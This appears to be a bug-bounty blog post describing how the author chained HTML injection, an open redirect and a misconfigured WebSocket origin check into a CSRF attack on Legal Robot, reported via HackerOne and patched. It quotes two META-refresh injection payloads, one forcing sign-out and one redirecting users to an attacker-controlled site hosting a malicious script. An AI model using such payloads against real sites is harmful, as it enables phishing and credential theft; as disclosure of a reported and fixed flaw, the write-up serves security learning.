Chain the vulnerabilities and take your report impact on the moon (CSRF to HTML INJECTION which results OPEN REDIRECT and could steal USER CREDENTIALS)

Image for post
Image for post

It was weekend and time for some Research. So i started reading some public disclosures from https://hackerone.com/hacktivity.
after reading some good blogs i have decided to implement them. so i quickly i had selected my target.

So i had noticed that legalrobot (Legal Robot)has a quick response and it is resolving the vulnerabilities quicky. so i have selected Legal Robot as my target and started looking into the assets and its scope.

after understanding the scope i had started looking into the application.and i had noticed that is not sanitizing the spacial characters from some parameters. so i started injecting some html tags and was able to inject html tags.

Image for post
Image for post

So yeah i had found HTML injection. BUG #1.

So i started finding xss over there that if i am able to execute xss or not.

so it had injected the payload but i had found that web application is using CSP. and alert was not popping up. :(((((((( sad part. :(

Image for post
Image for post

but if you are a hacker then you will never get satisfied until and unless you will exploit it

so i had started digging more and i put my second use case payload. which was

“/><META HTTP-EQUIV=”refresh” CONTENT=”1;url=https://app.legalrobot.com/sign-out">

So yes i with the help of this payload whenever the user visits the roadmap page it will automatically get log out from his-her account.

and i had found this tricky. so next i had tried to redirect on my website. and executive malicious script. so i used this payload

“/><META HTTP-EQUIV=”refresh” CONTENT=”1;url=http://www.mysite.com/malicious_script.html">

and what it was resulting to open redirectBUG #2

and also executing my malicious scripts.

Image for post
Image for post

some how i was able to perform malicious tasks.

Quickly i made a PoC of it and reported. and i got quick reply from team, which was this.

Image for post
Image for post

though the bug was triaged but the team member has mentioned that attacker has to do a little social engineering. i was like yeah but was not satisfied when i read “SOCIAL ENGINEERING” but the team member had gave me a hint by mentioning “UNKNOWN EXPLOIT”. well i that was enough hint for me.

again i started digging into the application. and while i was digging into the web application had noticed that the web application is using the websockets.

okay now i started checking headers of every pages and i found a Origin header. which was misconfigured. #BUG 3

so i started connecting to third party web sockets to this application and i was able to connect to the application by using the third party web sockets.

Image for post
Image for post

it was allows web socket connecting from different Origin & it should not work from different origin.

i think mobile app hasn’t origin. (I am still not sure about this)

so some how i was able to do CSRF attack BUG #4 by using this & i had chained HTML INJECTION WHICH WAS RESULTING TO OPEN REDIRECT to CSRF ATTACK.

again i quickly made a poc of this and reported it.

Image for post
Image for post

This was a quick reply & bug has patched in a single day. (SO QUICK)

Image for post
Image for post

got a good feedback with a sweet bounty amout.

Image for post
Image for post

Thanks HackerOne Legal Robot.

Thanks for reading guys. Comments most welcome.
have a great day ahead.

Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store